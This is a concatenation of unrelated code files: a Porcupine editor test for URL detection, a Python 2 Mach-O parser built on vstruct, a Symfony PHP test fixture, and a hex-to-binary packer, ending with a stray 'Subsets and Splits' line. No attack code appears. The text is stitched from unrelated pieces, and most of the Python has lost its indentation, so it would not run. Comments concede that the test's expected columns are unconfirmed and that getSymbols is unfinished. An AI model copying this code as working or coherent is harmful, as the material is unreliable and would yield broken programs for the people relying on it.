import tkinter
from porcupine import get_main_window
from porcupine.plugins.urls import find_urls
def test_find_urls_basic():
# Each template line embeds URL in a different textual context
# (quotes, parens, braces, markdown, RST); find_urls must report the
# exact span of the URL on every one of the 19 lines.
text = tkinter.Text(get_main_window())
urls = [
'https://github.com/Akuli/porcupine/',
'http://example.com/',
'http://example.com/comma,stuff',
]
for url in urls:
text.delete('1.0', 'end')
text.insert('end', '''\
URL
URL bla bla
"See also URL"
'URL bla'
(URL)
(URL ) often used with tools that don't understand parenthesized urls
{URL} might occur in Tcl code, for example
<URL>
("URL")bla
"(URL)" :)
Bla bla (URL, bla)
Bla (see URL)
See URL.
See URL, foo and bar.
[Link](URL)
[Link](URL), foo and bar
[Link](URL).
[Link](URL).</small> mixed markdown and HTML
`foo <URL>`_ RST link
'''.replace('URL', url))
# Expected: one (start, end) pair per template line, with the URL
# starting at column 10 — TODO confirm the column against the
# original (indentation appears stripped in this copy).
assert [(text.index(start), text.index(end)) for start, end in find_urls(text, '1.0', 'end')] == [
(f'{lineno}.10', f'{lineno}.{10 + len(url)}')
for lineno in range(1, 20)
]
# urls with parentheses in them don't need to work in all cases, just very basic support wanted
def test_url_containing_parens():
for url in ['https://en.wikipedia.org/wiki/Whitespace_(programming_language)', 'https://example.com/foo(bar)baz']:
text = tkinter.Text(get_main_window())
text.insert('1.0', f'''\
bla {url}
bla {url} bla
Bla {url}.
bla "{url}" bla
bla '{url}' bla
''')
# Expected: the full URL (parens included) detected on each of the
# five lines, starting at column 5 — TODO confirm column; the
# indentation of this copy appears stripped.
assert [(text.index(start), text.index(end)) for start, end in find_urls(text, '1.0', 'end')] == [
(f'{lineno}.5', f'{lineno}.{5 + len(url)}')
for lineno in range(1, 6)
]
'''
Structure definitions for the OSX MachO binary format.
'''
import struct
import vstruct
from vstruct.defs.macho.fat import *
from vstruct.defs.macho.const import *
from vstruct.defs.macho.stabs import *
from vstruct.defs.macho.loader import *
class mach_o(vstruct.VStruct):
# Top-level Mach-O parser: header plus the variable list of load
# commands. Python 2 code (print statements, xrange).
def __init__(self):
vstruct.VStruct.__init__(self)
# Raw file bytes retained for slicing segments/symbol tables later.
self._raw_bytes = ''
# Lazily-built symbol cache (see getSymbols).
self._symbols = None
self.mach_header = mach_header()
self.load_commands = vstruct.VStruct()
def getSymbols(self):
if self._symbols != None:
return self._symbols
self._symbols = []
# Walk LC_SYMTAB commands, resolving each nlist's name from the
# string table.
for fname,vs in self.load_commands:
if vs.cmd != LC_SYMTAB:
continue
strbytes = self._raw_bytes[vs.stroff:vs.stroff+vs.strsize]
#print repr(strbytes)
strtab = strbytes.split('\x00')
#print strtab
offset = vs.symoff
print 'NSYMS:',vs.nsyms
for i in xrange(vs.nsyms):
n = nlist() # FIXME 64!
offset = n.vsParse(self._raw_bytes, offset)
#symstr = strtab[n.n_strx]
# FIXME this is slow!
symstr = strbytes[n.n_strx:].split('\x00', 1)[0]
#print n.tree()
#print symstr
# NOTE(review): parsed symbols (n, symstr) are never appended to
# self._symbols and nothing is returned here — this method looks
# unfinished; verify before relying on it.
def getLibDeps(self):
'''
Return a list of the library files this Mach-O is dependant on
'''
ret = []
for fname, vs in self.load_commands:
if vs.cmd != LC_LOAD_DYLIB:
continue
ret.append(vs.namedata)
return ret
def getSegments(self):
'''
Return a list of (segname, rva, perms, bytes) tuples for the memory
segments defined by the loader commands
'''
ret = []
for fname, vs in self.load_commands:
if vs.cmd != LC_SEGMENT:
# Debug trace for unhandled command types.
print hex(vs.cmd),hex(vs.cmdsize) # 2, 5, b, e
continue
# Slice the segment bytes from raw bytes
fbytes = self._raw_bytes[ vs.fileoff: vs.fileoff + vs.filesize ]
# Pad out to virtual size
fbytes = fbytes.ljust(vs.vmsize, '\x00')
ret.append((vs.segname, vs.vmaddr, vs.initprot, fbytes))
return ret
def vsParse(self, bytes, offset=0):
# Keep the raw bytes (from 'offset' on) for later segment slicing.
self._raw_bytes = bytes[offset:]
offset = self.mach_header.vsParse(bytes, offset=offset)
#print bytes[offset:].encode('hex')
# Each load command starts with (cmd, cmdsize); dispatch on cmd to
# the matching vstruct class.
for i in xrange(self.mach_header.ncmds):
# should we use endian from header?
cmdtype, cmdlen = struct.unpack('<II', bytes[offset:offset+8])
cmdclass = getCommandClass(cmdtype)
cmdobj = cmdclass()
cmdobj.vsParse(bytes, offset=offset)
self.load_commands.vsAddField('cmd%d' % i, cmdobj)
offset += cmdobj.cmdsize
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Bundle\FrameworkBundle\Tests\Functional\Bundle\RoutingConditionServiceBundle\Service;
/**
 * Test fixture: a condition service registered via an explicit tag
 * (rather than autoconfiguration), exercised by the routing-condition
 * functional tests of this bundle.
 */
class ManuallyTaggedService
{
/**
 * Condition method that always allows the route.
 */
public function giveMeTrue(): bool
{
return true;
}
/**
 * Condition method that always rejects the route.
 */
public function giveMeFalse(): bool
{
return false;
}
}
from itoc import itoc
from ctoi import ctoi
from stoi import stoi
def _whitespace(c):
    """Return True when *c* is outside printable ASCII 0x21-0x7e
    (i.e. it should be skipped while tokenizing)."""
    code = ctoi(c)
    return code < 0x21 or code > 0x7e
def _scan_line(line,c):
for i in range(len(line)):
if line[i] == c or line[i] == '\n':
break
return i
def _parse_line(line):
    """Split a source line into two-character hex tokens.

    Everything from the first ';' (comment) onward is dropped, as is all
    non-printable/whitespace content. Always returns at least [''].
    """
    code = line[:_scan_line(line, ';')]
    tokens = ['']
    for ch in code:
        if _whitespace(ch):
            continue
        if len(tokens[-1]) == 2:
            # Current token is full; start the next one.
            tokens.append(ch)
        else:
            tokens[-1] += ch
    return tokens
def pack(if_name, of_name=None):
    """Packs text file of hex values into a binary file format.

    Reads *if_name* line by line, converts each two-character hex token
    (see _parse_line) to a character via stoi/itoc, and writes the
    result to *of_name* (defaults to if_name + '.b').
    """
    if of_name is None:
        of_name = if_name + '.b'
    output = ''
    # 'with' guarantees both handles are closed even if a conversion
    # raises (the previous version leaked them on error).
    with open(if_name, 'r') as infile:
        for line in infile:
            for token in _parse_line(line):
                output += itoc(stoi(token))
    # NOTE(review): kept text mode 'w' as before; since the output is a
    # "binary file format", 'wb' may be required on some platforms —
    # confirm what itoc produces before changing.
    with open(of_name, 'w') as outfile:
        outfile.write(output)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.